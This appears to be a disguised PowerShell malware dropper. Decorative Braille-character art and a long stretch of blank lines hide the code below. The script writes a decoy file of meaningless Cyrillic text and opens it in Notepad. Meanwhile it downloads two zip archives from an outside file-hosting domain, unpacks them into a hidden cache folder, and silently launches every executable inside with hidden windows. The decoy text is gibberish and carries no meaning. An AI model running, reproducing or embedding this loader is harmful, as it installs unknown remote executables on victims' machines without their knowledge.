#⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⡤⢤⣤⣤⣤⣤⣤⣄⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀
#⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣿⡿⣟⠯⡒⢯⣽⣓⣒⢾⣯⣭⣿⣿⠿⠭⠭⣯⣷⣦⡀⠀⠀⠀
#⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣯⣞⣕⣽⠾⠿⠿⠿⢿⣏⣿⣿⣿⡗⣽⣿⣿⣷⡝⣿⣿⡆⠀⠀
#⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣛⠛⢿⣛⢝⢁⣀⣀⣀⠓⠶⠈⣿⣿⡿⠗⠉⠁⢀⣀⣹⣛⣛⣳⢄⠀
#⠀⠀⠀⠀⠀⠀⠀⠀⡔⡾⢁⣴⡆⢦⣬⣙⣛⣋⣤⣿⣿⣷⣾⣿⣿⣿⡆⢿⣿⡟⠻⠛⡉⣍⣲⢱⠁
#⠀⠀⠀⠀⠀⠀⠀⠀⣇⣇⢸⣉⡀⢦⣌⡙⠻⠿⣯⣭⣥⠡⡤⠿⢿⣿⣿⡆⠉⡻⢿⣿⠇⢻⣟⠼⠀
#⠀⠀⠀⠀⠀⠀⠀⠀⠈⠪⣴⣿⣧⡀⢉⠛⠘⢶⣦⣬⠉⣀⠓⠿⠿⠯⢉⣴⠿⠿⠓⡁⡄⠀⣿⠃⠀
#⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⣿⣿⣷⣌⠻⢠⣤⣀⠉⠐⠛⠿⠿⠰⠶⠦⠰⠶⠇⠘⠃⠁⠀⣿⠀⠀
#⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⢿⣿⣿⣷⣌⠻⢿⠇⣼⣶⣦⡄⣄⣀⡀⢀⡀⢀⡀⡀⠀⢠⣿⠀⠀
#⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠯⣛⠭⣻⠶⣬⣉⣛⠛⠃⠿⠿⠃⠿⠃⠚⣀⣁⣤⣾⣿⡀⠀
#⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠒⠯⣶⣋⡽⢛⣿⣯⣿⣭⣭⡿⢿⣿⣻⣾⢟⣿⡇⠀
#⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠛⠿⠿⣶⣾⣿⣿⣿⣭⣭⣭⣶⣿⡿⠁⠀
#⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠙⠛⠛⠛⠛⠋⠁⠀⠀⠀























































































$f="$env:TEMP\a.txt";[System.IO.File]::WriteAllText($f,@'

пывалплцулкецуклваыпдудкцепывалплцулкецуклваыпдудкцепывалплцулкецуклваыпдудкцепывалплцулкецуклваыпдудкцепывалплцулкецуклваыпдудкце
апрлукцелцулк лелцу hello guys! оывапл йцукзейцумщзейукцие оывапл йцукзейцумщзейукцие оывапл йцукзейцумщзейукцие оывапл йцукзейцумщзейукцие пао кунекуенку ррпапар
валплцулкецуклваыпдудкцепывалплцулкецуклваыпдудкцевалплцулкецуклваыпдудкцепывалплцулкецуклваыпдудкцевалплцулкецуклваыпдудкцепывалплцулкецуклваыпдудкце
валплцулкецуклваыпдудкцепывалплцулкецуклваыпдудкце
399 - лопдывап
валплцулкецуклваыпдудкцепывалплцулкецуклваыпдудкцевалплцулкецуклваыпдудкцепывалплцулкецуклваыпдудкце
валплцулкецуклваыпдудкцепывалплцулкецуклваыпдудкце
валплцулкецуклваыпдудкцепывалплцулкецуклваыпдудкце

'@);notepad $f
$u='https://hexfiles.lol/d/cf3238878159','https://hexfiles.lol/d/0205765929d6';$b="$home\.cache";md $b -ErrorAction SilentlyContinue|Out-Null;$u|%{$d="$b\$([guid]::NewGuid())";md $d|Out-Null;$z="$d.zip";(New-Object Net.WebClient).DownloadFile($_,$z);Expand-Archive $z $d -Force;Get-ChildItem $d -Recurse *.exe|%{Start-Process $_.FullName -WindowStyle Hidden}}
